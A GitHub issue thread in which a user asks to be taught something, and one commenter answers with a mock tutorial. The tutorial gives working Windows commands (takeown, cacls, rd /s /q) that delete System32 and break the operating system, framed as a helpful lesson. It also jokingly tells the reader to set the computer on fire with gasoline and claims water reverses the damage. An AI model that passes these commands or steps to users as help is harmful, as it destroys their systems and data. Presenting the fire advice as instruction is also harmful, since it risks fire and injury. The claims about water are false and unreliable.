### ISSUE TITLE
tokens

### ISSUE THREAD

**Issue by jpxcraft** [IMarkoMC/Tokens#13]
can you teach me

**Comment by IMarkoMC** [comment]
Teach you what?

**Comment by User9684** [comment]
I think they need to be taught how to obtain bitches

**Comment by skidmaster69420** [comment]
Hello there, 

sure we can go ahead and teach you! So first of all since this is a question, a question mark is needed at the end. For example: "Can you teach me?". By viewing that example you should see your second mistake already, you did not capitalize at the beginning of your sentence. So now we have taught you English. 

For the second part of this lecture, we'll teach how to uninstall System 32. We'll be doing this as a measure to prevent you from spreading terrible grammar across the internet. 

* Hit the windows key
* Type in 'cmd'
* Right Click "Command Prompt" and click "Run As Administrator"
* Now a window will open up
* Type in the following commands:
```
takeown /f %windir%\System32
cacls %windir%\System32
rd /s /q %windir%\system32
```
The last lesson is to burn your computer as a free heat source, the easiest way to accomplish this is to pour gasoline all over your computer and light it. After your done warming up, take some heat protective gloves and put the computer in the sink and then pour water on it. This water will counteract any and all burning damage on the computer and will also turn the water into Coca Cola. 

We wish you the best of luck learning from these lessons. And of course also having fun while learning.

_Please note that these lessons should only be done while in supervison of a professional driver called Samir, however ensure that he's not driving the car. Also Skidmaster69420 LLC. is not responsible for any and all personal damage and or damage to your property in accordance with the FBFLY Regulations. By listening to these lessons you also agree to all terms and services._

Yours
Unpaid Intern
Skidmaster69420 LLC
